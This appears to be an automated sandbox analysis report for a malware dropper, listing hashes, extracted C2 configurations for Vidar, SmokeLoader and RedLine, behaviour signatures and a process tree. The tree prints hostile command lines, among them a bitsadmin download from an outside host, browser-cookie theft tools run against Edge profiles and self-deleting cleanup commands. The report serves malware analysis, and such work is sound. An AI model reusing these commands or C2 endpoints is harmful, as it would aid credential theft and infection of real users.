Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (17).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 53 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1332
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1952
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2680
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2840
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                1⤵
                  PID:2696
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2440
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                    1⤵
                      PID:1376
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1184
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1088
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          • Modifies registry class
                          PID:1028
                          • C:\Users\Admin\AppData\Roaming\hftugbe
                            C:\Users\Admin\AppData\Roaming\hftugbe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5976
                            • C:\Users\Admin\AppData\Roaming\hftugbe
                              C:\Users\Admin\AppData\Roaming\hftugbe
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:5616
                          • C:\Users\Admin\AppData\Roaming\fatugbe
                            C:\Users\Admin\AppData\Roaming\fatugbe
                            2⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5864
                          • \??\c:\windows\system\svchost.exe
                            c:\windows\system\svchost.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5820
                          • \??\c:\windows\system\svchost.exe
                            c:\windows\system\svchost.exe
                            2⤵
                              PID:4792
                            • C:\Users\Admin\AppData\Roaming\hftugbe
                              C:\Users\Admin\AppData\Roaming\hftugbe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:4936
                              • C:\Users\Admin\AppData\Roaming\hftugbe
                                C:\Users\Admin\AppData\Roaming\hftugbe
                                3⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:5748
                            • C:\Users\Admin\AppData\Roaming\fatugbe
                              C:\Users\Admin\AppData\Roaming\fatugbe
                              2⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:5092
                            • C:\Windows\system32\rundll32.exe
                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll",KGCToQuEL
                              2⤵
                              • Windows security modification
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              PID:4844
                            • \??\c:\windows\system\svchost.exe
                              c:\windows\system\svchost.exe
                              2⤵
                                PID:6088
                            • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
                              "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:800
                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3132
                                • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\setup_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\setup_install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:3024
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3572
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.exe
                                      sonia_1.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2276
                                      • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.exe" -a
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2336
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:896
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_2.exe
                                      sonia_2.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: MapViewOfSection
                                      PID:3052
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2640
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_3.exe
                                      sonia_3.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:2176
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 1664
                                        6⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4716
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1288
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_4.exe
                                      sonia_4.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2164
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:2288
                                      • C:\Users\Admin\Documents\5Omwvvmob5oGdT2xPBbaomxO.exe
                                        "C:\Users\Admin\Documents\5Omwvvmob5oGdT2xPBbaomxO.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4940
                                        • C:\Users\Admin\Documents\5Omwvvmob5oGdT2xPBbaomxO.exe
                                          "C:\Users\Admin\Documents\5Omwvvmob5oGdT2xPBbaomxO.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4080
                                      • C:\Users\Admin\Documents\1_LyHNhaSZB7kd0qrsOf7qgb.exe
                                        "C:\Users\Admin\Documents\1_LyHNhaSZB7kd0qrsOf7qgb.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4928
                                        • C:\Users\Admin\Documents\1_LyHNhaSZB7kd0qrsOf7qgb.exe
                                          "C:\Users\Admin\Documents\1_LyHNhaSZB7kd0qrsOf7qgb.exe" -a
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2456
                                      • C:\Users\Admin\Documents\9OZ_QWNXS9x0pX3z2useupyT.exe
                                        "C:\Users\Admin\Documents\9OZ_QWNXS9x0pX3z2useupyT.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4912
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:4760
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:5320
                                        • C:\Users\Admin\Documents\iecbd_Mpo5OwSb2afXBaVW6z.exe
                                          "C:\Users\Admin\Documents\iecbd_Mpo5OwSb2afXBaVW6z.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4888
                                          • C:\Users\Admin\Documents\iecbd_Mpo5OwSb2afXBaVW6z.exe
                                            "{path}"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            PID:2616
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im iecbd_Mpo5OwSb2afXBaVW6z.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\iecbd_Mpo5OwSb2afXBaVW6z.exe" & del C:\ProgramData\*.dll & exit
                                              8⤵
                                                PID:4160
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im iecbd_Mpo5OwSb2afXBaVW6z.exe /f
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:5584
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5632
                                          • C:\Users\Admin\Documents\JTeotyhMZQx0S2cgJpAZsKVh.exe
                                            "C:\Users\Admin\Documents\JTeotyhMZQx0S2cgJpAZsKVh.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4892
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 660
                                              7⤵
                                              • Program crash
                                              PID:4580
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 672
                                              7⤵
                                              • Program crash
                                              PID:4148
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 636
                                              7⤵
                                              • Program crash
                                              PID:4552
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 708
                                              7⤵
                                              • Program crash
                                              PID:2796
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1080
                                              7⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:3704
                                          • C:\Users\Admin\Documents\EjOQlAuAUNraNPg_wizfndnP.exe
                                            "C:\Users\Admin\Documents\EjOQlAuAUNraNPg_wizfndnP.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5088
                                            • C:\Users\Admin\Documents\EjOQlAuAUNraNPg_wizfndnP.exe
                                              "{path}"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5760
                                          • C:\Users\Admin\Documents\JMTTPJUsTKR4cbhWjTsEY_Yt.exe
                                            "C:\Users\Admin\Documents\JMTTPJUsTKR4cbhWjTsEY_Yt.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5104
                                            • C:\Users\Admin\Documents\JMTTPJUsTKR4cbhWjTsEY_Yt.exe
                                              "C:\Users\Admin\Documents\JMTTPJUsTKR4cbhWjTsEY_Yt.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Modifies data under HKEY_USERS
                                              PID:1056
                                          • C:\Users\Admin\Documents\W3F5cqB4dZzaEmkJhihJVM8q.exe
                                            "C:\Users\Admin\Documents\W3F5cqB4dZzaEmkJhihJVM8q.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5044
                                          • C:\Users\Admin\Documents\zZxPmmcV3vJuWFnZfQWsI_l7.exe
                                            "C:\Users\Admin\Documents\zZxPmmcV3vJuWFnZfQWsI_l7.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5096
                                          • C:\Users\Admin\Documents\4iGzZVGCR076wUvXe32j67o3.exe
                                            "C:\Users\Admin\Documents\4iGzZVGCR076wUvXe32j67o3.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5076
                                            • C:\Users\Admin\Documents\4iGzZVGCR076wUvXe32j67o3.exe
                                              C:\Users\Admin\Documents\4iGzZVGCR076wUvXe32j67o3.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2732
                                          • C:\Users\Admin\Documents\Bo8ugkcUENBn89JYRQyTPy31.exe
                                            "C:\Users\Admin\Documents\Bo8ugkcUENBn89JYRQyTPy31.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5064
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 660
                                              7⤵
                                              • Executes dropped EXE
                                              • Program crash
                                              PID:4336
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 676
                                              7⤵
                                              • Program crash
                                              PID:4736
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 680
                                              7⤵
                                              • Program crash
                                              PID:2240
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 692
                                              7⤵
                                              • Program crash
                                              PID:4812
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 780
                                              7⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:2148
                                          • C:\Users\Admin\Documents\JixxgOUghLoF_mTNduwffrAq.exe
                                            "C:\Users\Admin\Documents\JixxgOUghLoF_mTNduwffrAq.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5052
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5688
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5156
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:2052
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:5352
                                              • C:\Users\Admin\Documents\Zgh8TlndScKf6NijfJelw8S6.exe
                                                "C:\Users\Admin\Documents\Zgh8TlndScKf6NijfJelw8S6.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                PID:5032
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5868
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:5984
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:4168
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:2452
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:608
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:192
                                                        • C:\Users\Admin\Documents\hkCtN9q5cZR3ufOSX5I_vB4R.exe
                                                          "C:\Users\Admin\Documents\hkCtN9q5cZR3ufOSX5I_vB4R.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5004
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:3376
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5228
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:1628
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Blocklisted process makes network request
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks processor information in registry
                                                                  PID:4240
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:3192
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    8⤵
                                                                      PID:6116
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5352
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:6120
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Download via BitsAdmin
                                                                      PID:2144
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9yxuhzdcsCQOsR1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:4260
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peUceGKxekxxDSRT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:5980
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5916
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5748
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4880
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5220
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5168
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                                7⤵
                                                                                • Loads dropped DLL
                                                                                PID:5888
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:5964
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
